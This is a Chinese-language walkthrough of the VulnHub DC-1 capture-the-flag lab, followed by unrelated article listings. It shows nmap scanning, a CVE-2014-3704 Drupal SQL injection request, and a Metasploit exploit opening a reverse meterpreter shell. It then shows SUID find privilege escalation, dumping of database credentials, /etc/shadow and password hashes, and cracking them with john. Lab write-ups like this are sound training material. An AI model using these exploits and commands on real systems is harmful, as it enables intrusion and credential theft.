[vulnhub]DC: 1

https://www.vulnhub.com/entry/dc-1,292/

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    因为靶机是我最后添加的,所以靶机IP是156

    nmap -sP 192.168.75.0/24     
    //            
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:48 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00012s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00012s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.156
    Host is up (0.00088s latency).
    MAC Address: 00:0C:29:47:FC:83 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00042s latency).
    MAC Address: 00:50:56:FB:E7:F4 (VMware)
    Nmap scan report for 192.168.75.151
    Host is up.
    
  2. 扫描主机开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.156
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:48 CST
    Nmap scan report for 192.168.75.156
    Host is up (0.00010s latency).
    Not shown: 65531 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    22/tcp    open  ssh
    80/tcp    open  http
    111/tcp   open  rpcbind
    39179/tcp open  unknown
    MAC Address: 00:0C:29:47:FC:83 (VMware)
    
  3. 扫描主机服务版本以及系统版本

    nmap -sT -sV -O -p22,80,111,39179 192.168.75.156
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:49 CST
    Nmap scan report for 192.168.75.156
    Host is up (0.00054s latency).PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
    80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    39179/tcp open  status  1 (RPC #100024)
    MAC Address: 00:0C:29:47:FC:83 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X
    OS CPE: cpe:/o:linux:linux_kernel:3
    OS details: Linux 3.2 - 3.16
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p22,80,111,39179 192.168.75.156
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:54 CST
    Nmap scan report for 192.168.75.156
    Host is up (0.00053s latency).PORT      STATE SERVICE
    22/tcp    open  ssh
    80/tcp    open  http
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.156
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.75.156:80/
    |     Form id: user-login-form
    |     Form action: /node?destination=node
    |     
    |     Path: http://192.168.75.156:80/user/password
    |     Form id: user-pass
    |     Form action: /user/password
    |     
    |     Path: http://192.168.75.156:80/node?destination=node
    |     Form id: user-login-form
    |     Form action: /node?destination=node
    |     
    |     Path: http://192.168.75.156:80/user/register
    |     Form id: user-register-form
    |     Form action: /user/register
    |     
    |     Path: http://192.168.75.156:80/user
    |     Form id: user-login
    |     Form action: /user
    |     
    |     Path: http://192.168.75.156:80/user/
    |     Form id: user-login
    |_    Form action: /user/
    | http-vuln-cve2014-3704: 
    |   VULNERABLE:
    |   Drupal - pre Auth SQL Injection Vulnerability
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2014-3704
    |         The expandArguments function in the database abstraction API in
    |         Drupal core 7.x before 7.32 does not properly construct prepared
    |         statements, which allows remote attackers to conduct SQL injection
    |         attacks via an array containing crafted keys.
    |           
    |     Disclosure date: 2014-10-15
    |     References:
    |       http://www.securityfocus.com/bid/70595
    |       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
    |_      https://www.drupal.org/SA-CORE-2014-005
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |   /rss.xml: RSS or Atom feed
    |   /robots.txt: Robots file
    |   /UPGRADE.txt: Drupal file
    |   /INSTALL.txt: Drupal file
    |   /INSTALL.mysql.txt: Drupal file
    |   /INSTALL.pgsql.txt: Drupal file
    |   /: Drupal version 7 
    |   /README: Interesting, a readme.
    |   /README.txt: Interesting, a readme.
    |   /0/: Potentially interesting folder
    |_  /user/: Potentially interesting folder
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    111/tcp   open  rpcbind
    39179/tcp open  unknown
    MAC Address: 00:0C:29:47:FC:83 (VMware)
    

    疑似sql注入和CSRF,以及一些让人感兴趣的目录

web渗透

  1. 主页面有三个链接,login new account req new password

    在这里插入图片描述

  2. 访问让人感兴趣的目录

    • robots.txt 列出了很多的目录

      User-agent: *
      Crawl-delay: 10
      # Directories
      Disallow: /includes/
      Disallow: /misc/
      Disallow: /modules/
      Disallow: /profiles/
      Disallow: /scripts/
      Disallow: /themes/
      # Files
      Disallow: /CHANGELOG.txt
      Disallow: /cron.php
      Disallow: /INSTALL.mysql.txt
      Disallow: /INSTALL.pgsql.txt
      Disallow: /INSTALL.sqlite.txt
      Disallow: /install.php
      Disallow: /INSTALL.txt
      Disallow: /LICENSE.txt
      Disallow: /MAINTAINERS.txt
      Disallow: /update.php
      Disallow: /UPGRADE.txt
      Disallow: /xmlrpc.php
      # Paths (clean URLs)
      Disallow: /admin/
      Disallow: /comment/reply/
      Disallow: /filter/tips/
      Disallow: /node/add/
      Disallow: /search/
      Disallow: /user/register/
      Disallow: /user/password/
      Disallow: /user/login/
      Disallow: /user/logout/
      # Paths (no clean URLs)
      Disallow: /?q=admin/
      Disallow: /?q=comment/reply/
      Disallow: /?q=filter/tips/
      Disallow: /?q=node/add/
      Disallow: /?q=search/
      Disallow: /?q=user/password/
      Disallow: /?q=user/register/
      Disallow: /?q=user/login/
      Disallow: /?q=user/logout/
      
  3. 已知CMS是Drupal 7 PHP 5.4.45 Apache 2.2.22

    Drupal 版本可以在install.php 找到,打开F12可以找到 Drupal 7 (http://drupal.org)

    晚上查阅漏洞

    • CVE-2014-3704 Drupal SQL注入漏洞 ,SQL注入,尝试爆出数据

      直接放在bp的重放器使用

      POST /?q=node&destination=node HTTP/1.1
      Host: 192.168.75.156
      Accept-Encoding: gzip, deflate
      Accept: */*
      Accept-Language: en
      User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 126pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,database()),0)%23]=bob&name[0]=a
      
      用户: dbuser@localhost
      当前库: drupaldb
      版本: mysql 5.5.60-0+deb7u1
      

      尝试了联合语句好像太长了,无法使用漏洞,我们丢给sqlmap尝试

      drupaldb没查到任何数据

    • 使用MSF搜索漏洞

      msf6 > search DrupalMatching Modules
      ================#  Name                                           Disclosure Date  Rank       Check  Description-  ----                                           ---------------  ----       -----  -----------0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
      

      使用第三个,Drupal HTTP Parameter Key/Value SQL Injection

      msf6 > use exploit/multi/http/drupal_drupageddon 
      [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
      msf6 exploit(multi/http/drupal_drupageddon) > show options
      msf6 exploit(multi/http/drupal_drupageddon) > set rhosts 192.168.75.156
      msf6 exploit(multi/http/drupal_drupageddon) > exploit
      [*] Started reverse TCP handler on 192.168.75.151:4444 
      [*] Sending stage (39927 bytes) to 192.168.75.156
      [*] Meterpreter session 1 opened (192.168.75.151:4444 -> 192.168.75.156:43212) at 2024-09-28 14:32:44 +0800meterpreter > 
      

      拿到shell

提权

  1. 查看权限

    www-data@DC-1:/var/www$ whoami
    www-data
    //
    www-data@DC-1:/var/www$ uname -a
    Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
    //
    www-data@DC-1:/var/www$ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    //
    www-data@DC-1:/var/www$ sudo -l
    bash: sudo: command not found
    //
    www-data@DC-1:/var/www$ find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/ping
    /bin/su
    /bin/ping6
    /bin/umount
    /usr/bin/at
    /usr/bin/chsh
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/chfn
    /usr/bin/gpasswd
    /usr/bin/procmail
    /usr/bin/find
    /usr/sbin/exim4
    /usr/lib/pt_chown
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /sbin/mount.nfs
    
  2. 当前目录下存在flag1.txt

    Every good CMS needs a config file - and so do you.
    
  3. 因为我们查找/var/www$ find / -perm -u=s -type f 2>/dev/null 的时候发现了find 有suid权限,所以可以直接提权

    www-data@DC-1:/var/www$ find flag1.txt -exec 'whoami' \;
    root
    
    www-data@DC-1:/var/www$ find flag1.txt -exec '/bin/sh' \;
    find flag1.txt -exec '/bin/sh' \;
    # whoami
    whoami
    

    读取/root下的thefinalflag.txt

    Well done!!!!Hopefully you've enjoyed this and learned some new skills.You can let me know what you thought of this little journey
    by contacting me via Twitter - @DCAU7
    

flag

  • flag1,在获得shell的时候当前目录下

  • flag2

    尝试寻找Drupal的数据库配置文件 Sites/default/settings.phpflag2 就在里面

    # cat /var/www/sites/default/settings.php
    //
    <?php/**** flag2* Brute force and dictionary attacks aren't the* only ways to gain access (and you WILL need access).* What can you do with these credentials?**/$databases = array ('default' => array ('default' => array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),
    );
    
  • flag3

    登录mysql数据库看看是否存在flag

    mysql> show databases;
    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | drupaldb           |
    +--------------------+
    //
    mysql> show tables;
    +-----------------------------+
    | Tables_in_drupaldb          |
    +-----------------------------+
    | actions                     |
    | authmap                     |
    | batch                       |
    | block                       |
    | block_custom                |
    | block_node_type             |
    | block_role                  |
    | blocked_ips                 |
    | cache                       |
    | cache_block                 |
    | cache_bootstrap             |
    | cache_field                 |
    | cache_filter                |
    | cache_form                  |
    | cache_image                 |
    | cache_menu                  |
    | cache_page                  |
    | cache_path                  |
    | cache_update                |
    | cache_views                 |
    | cache_views_data            |
    | comment                     |
    | ctools_css_cache            |
    | ctools_object_cache         |
    | date_format_locale          |
    | date_format_type            |
    | date_formats                |
    | field_config                |
    | field_config_instance       |
    | field_data_body             |
    | field_data_comment_body     |
    | field_data_field_image      |
    | field_data_field_tags       |
    | field_revision_body         |
    | field_revision_comment_body |
    | field_revision_field_image  |
    | field_revision_field_tags   |
    | file_managed                |
    | file_usage                  |
    | filter                      |
    | filter_format               |
    | flood                       |
    | history                     |
    | image_effects               |
    | image_styles                |
    | menu_custom                 |
    | menu_links                  |
    | menu_router                 |
    | node                        |
    | node_access                 |
    | node_comment_statistics     |
    | node_revision               |
    | node_type                   |
    | queue                       |
    | rdf_mapping                 |
    | registry                    |
    | registry_file               |
    | role                        |
    | role_permission             |
    | search_dataset              |
    | search_index                |
    | search_node_links           |
    | search_total                |
    | semaphore                   |
    | sequences                   |
    | sessions                    |
    | shortcut_set                |
    | shortcut_set_users          |
    | system                      |
    | taxonomy_index              |
    | taxonomy_term_data          |
    | taxonomy_term_hierarchy     |
    | taxonomy_vocabulary         |
    | url_alias                   |
    | users                       |
    | users_roles                 |
    | variable                    |
    | views_display               |
    | views_view                  |
    | watchdog                    |
    +-----------------------------+
    //
    mysql> select * from users;
    +-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+
    | uid | name   | pass                                                    | mail                   | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init                   | data |
    +-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+
    |   0 |        |                                                         |                        |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                        | NULL |
    |   1 | admin  | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com      |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com      | b:0; |
    |   2 | Fred   | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org       |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org       | b:0; |
    +-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+
    

    尝试使用john破解admin的密码,53cr3t

    john --wordlist=/usr/share/wordlists/rockyou.txt pass 
    //
    Using default input encoding: UTF-8
    Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
    Cost 1 (iteration count) is 32768 for all loaded hashes
    Will run 8 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    53cr3t           (?)     
    1g 0:00:22:32 DONE (2024-09-28 16:03) 0.000739g/s 1657p/s 1657c/s 1657C/s 53cr3t5..539831
    Use the "--show" option to display all of the cracked passwords reliably
    

    还有一种方法:网上查阅在网站目录的 scripts目录里面有个用于生成密码的password-hash.php文件

    // 生成 ilovesunset 的密码hash
    php password-hash.php 'ilovesunset' > 1.txt
    

    然后数据库里将密码覆盖上去即可

    拿到密码53cr3t后,登录

    在这里插入图片描述

    点击find content ,存在flag3 ,内容是

    flag3 
    Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
    
  • flag4

    根据提示,flag4应该在/etc/shadows

    # cat /etc/shadow
    //
    root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::
    daemon:*:17946:0:99999:7:::
    bin:*:17946:0:99999:7:::
    sys:*:17946:0:99999:7:::
    sync:*:17946:0:99999:7:::
    games:*:17946:0:99999:7:::
    man:*:17946:0:99999:7:::
    lp:*:17946:0:99999:7:::
    mail:*:17946:0:99999:7:::
    news:*:17946:0:99999:7:::
    uucp:*:17946:0:99999:7:::
    proxy:*:17946:0:99999:7:::
    www-data:*:17946:0:99999:7:::
    backup:*:17946:0:99999:7:::
    list:*:17946:0:99999:7:::
    irc:*:17946:0:99999:7:::
    gnats:*:17946:0:99999:7:::
    nobody:*:17946:0:99999:7:::
    libuuid:!:17946:0:99999:7:::
    Debian-exim:!:17946:0:99999:7:::
    statd:*:17946:0:99999:7:::
    messagebus:*:17946:0:99999:7:::
    sshd:*:17946:0:99999:7:::
    mysql:!:17946:0:99999:7:::
    flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::
    

    flag4那行保存为flag4再使用john破解,的到密码orange

    john --wordlist=/usr/share/wordlists/rockyou.txt flag4                                                                                             
    Using default input encoding: UTF-8
    Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
    Cost 1 (iteration count) is 5000 for all loaded hashes
    Will run 8 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    orange           (flag4)     
    1g 0:00:00:00 DONE (2024-09-28 16:23) 12.50g/s 12800p/s 12800c/s 12800C/s 123456..bethany
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed.
    

    使用ssh登录

    然后读取加目录下的flag4.txt

    Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy.  Or maybe it is?
    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/58199.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

无人机目标检测与语义分割数据集(猫脸码客 第238期)

UAV无人机数据集&#xff1a;推动无人机配送研究的创新力量 随着科技的飞速发展&#xff0c;无人机配送作为一种新兴的物流方式&#xff0c;正逐渐改变着人们的生活方式。为了深入研究和优化无人机配送技术&#xff0c;一个名为UAV Delievery的无人机数据集应运而生。本文将详…

Vue组件间通信的9种实现方式

组件的通信 父子组件通信 父子组件通信可以理解成&#xff1a; 父组件向子组件传值。 父组件调用子组件的方法。 子组件向父组件传值。 子组件调用父组件的方法。 1.props: 利用props属性实现父组件向子组件传值。 parent.vue文件 <template><div>父组件<!…

jmeter脚本-请求体设置变量and请求体太长的处理

目录 1、查询接口 1.1 准备组织列表的TXT文件&#xff0c;如下&#xff1a; 1.2 添加 CSV数据文件设置 &#xff0c;如下&#xff1a; 1.3 接口请求体设置变量&#xff0c;如下&#xff1a; 2、创建接口 2.1 见1.1 2.2 见1.2 2.3 准备创建接口的请求体TXT文件&#xff…

SQL,力扣题目1549,每件商品的最新订单【窗口函数】

一、力扣链接 LeetCode_1549 二、题目描述 表: Customers ------------------------ | Column Name | Type | ------------------------ | customer_id | int | | name | varchar | ------------------------ customer_id 是该表主键. 该表包含消费者的…

函数指针和指针函数的区别

函数指针和指针函数是 C 语言中两个重要的概念&#xff0c;它们在功能和用途上有显著区别。下面将详细解释这两者的含义、用法以及各自的示例。 一、定义 函数指针&#xff08;Function Pointer&#xff09;&#xff1a; 函数指针是指向函数的指针。通过函数指针&#xff0c;可…

【网络】HTTP(超文本传输协议)详解

目录 引言一、HTTP的基本概念1.1 什么是HTTP&#xff1f;1.2 HTTP的工作流程1.3 HTTP工作流程图 二、HTTP请求与响应2.1 HTTP请求格式2.2 HTTP响应格式 三、常见的HTTP状态码3.1 其他状态码示例 四、HTTP版本的演变4.1 HTTP/1.04.2 HTTP/1.14.3 HTTP/24.4 HTTP/3 五、HTTP的安全…

卸载 Adobe Genuine Software Client

一、问题描述 使用破jie版Adobe Acrobat Pro DC软件后&#xff0c;会经常弹出以下窗口&#xff1a; 且上述探窗无法直接关掉。即使通过任务管理器将其临时关掉&#xff0c;可等过一段时间后&#xff0c;仍然会再次弹出&#xff0c;严重干扰工作进度。 二、问题解决 &#xff…

点云从入门到精通技术详解100篇-基于结构光测量的三维人脸重建及识别

目录 前言 三维人脸识别技术国内外现状 二维人脸识别研究现状 三维测量技术研究现状 三维人脸识别研究现状 2三维人脸重建及识别系统方案 2.1 基于结构光的三维人脸重建及识别系统构成 2.1.1 典型的投影光栅相位测量几何模型 2.1.1.1 平行式投影系统 2.1.1.2 交叉…

京东云雅典娜刷机步骤(需要拆机)

京东云雅典娜刷机步骤 必须拆机 必须拆机 必须拆机 刷机要用的文件 1.高通驱动文件&#xff08;USB刷机必备&#xff09;&#xff1a;https://pan.quark.cn/s/6405674f981b 2.进入临时uboot的程序&#xff1a;https://pan.quark.cn/s/ebc1d449cb89 3.uboot固件&#xff1a; ht…

电子商城购物平台的设计与开发+ssm(lw+演示+源码+运行)

摘 要 随着我国经济迅速发展&#xff0c;人们对手机的需求越来越大&#xff0c;各种手机软件也都在被广泛应用&#xff0c;但是对于手机进行数据信息管理&#xff0c;对于手机的各种软件也是备受用户的喜爱&#xff0c;电子商城购物平台小程序被用户普遍使用&#xff0c;为方便…

基于 Spring Boot 和 Vue 的门票销售创新系统

作者介绍&#xff1a;✌️大厂全栈码农|毕设实战开发&#xff0c;专注于大学生项目实战开发、讲解和毕业答疑辅导。 &#x1f345;获取源码联系方式请查看文末&#x1f345; 推荐订阅精彩专栏 &#x1f447;&#x1f3fb; 避免错过下次更新 Springboot项目精选实战案例 更多项目…

【Python】Python自习课:第一个python程序

【Python】Python自习课&#xff1a;第一个python程序 示例

docker-compose安装rabbitmq 并开启延迟队列和管理面板插件(rabbitmq_delayed_message_exchange)

问题&#xff1a; 解决rabbitmq-plugins enable rabbitmq_delayed_message_exchange &#xff1a;plugins_not_found 我是在docker-compose环境部署的 services:rabbitmq:image: rabbitmq:4.0-managementrestart: alwayscontainer_name: rabbitmqports:- 5672:5672- 15672:156…

103 - Lecture 2 Table and Data Part 1

SQL - Tables and Data Part 1 Relational Database Management System(RDBMS) 关系型数据库管理系统&#xff08;RDBMS&#xff09;是基于关系模型的数据库系统&#xff0c;它支持多种关系操作。关系模型是一种数据存储和检索的模型&#xff0c;它使用表格来组织数据&#x…

Linux云计算个人学习总结(二)

高级文件系统 一、RSYNC概述 1、作用&#xff1a;快速的文件复制工具&#xff08;支持本地和远程&#xff09;&#xff0c;以及删除、查看等基本功能。 2、特点&#xff1a;支持实时&#xff08;inotify、sersync&#xff09;的增量备份工具3、模式&#xff1a;检查模式&#…

PropTypes 和 TypeScript 在 React 中的比较

文章目录 引言PropTypes什么是 PropTypes&#xff1f;如何使用 PropTypes优点缺点 TypeScript什么是 TypeScript&#xff1f;如何使用 TypeScript优点缺点 选择建议总结 引言 在 React 开发中&#xff0c;组件的可复用性和可维护性至关重要。为了确保组件接收到正确的 props&a…

CommunityToolkit.Mvvm如何使用

CommunityToolkit.Mvvm 是一个现代、快速和模块化的 MVVM 库&#xff0c;用于 .NET 应用程序。以下是如何使用 CommunityToolkit.Mvvm 的基本步骤&#xff1a; 安装包&#xff1a; 你可以通过 NuGet 包管理器安装 CommunityToolkit.Mvvm。在 Visual Studio 中&#xff0c;你可以…

【自动化利器】12个评估大语言模型(LLM)质量的自动化框架

LLM评估是指在人工智能系统中评估和改进语言和语言模型的过程。在人工智能领域&#xff0c;特别是在自然语言处理&#xff08;NLP&#xff09;及相关领域&#xff0c;LLM评估具有至高无上的地位。通过评估语言生成和理解模型&#xff0c;LLM评估有助于细化人工智能驱动的语言相…

mybatis源码解析-sql执行流程

1 执行器的创建 1. SimpleExecutor 描述&#xff1a;最基本的执行器&#xff0c;每次查询都会创建新的语句对象&#xff0c;并且不会缓存任何结果。 特点&#xff1a; 每次查询都会创建新的 PreparedStatement 对象。 不支持一级缓存。 适用于简单的查询操作&#xff0c;不…

儿童安全座椅行业全面深入分析

儿童安全座椅就是一种专为不同体重&#xff08;或年龄段&#xff09;的儿童设计&#xff0c;将孩子束缚在安全座椅内&#xff0c;能有效提高儿童乘车安全的座椅。欧洲强制性执行标准ECE R44/03的定义是&#xff1a;能够固定到机动车辆上&#xff0c;带有ISOFIX接口、LATCH接口的…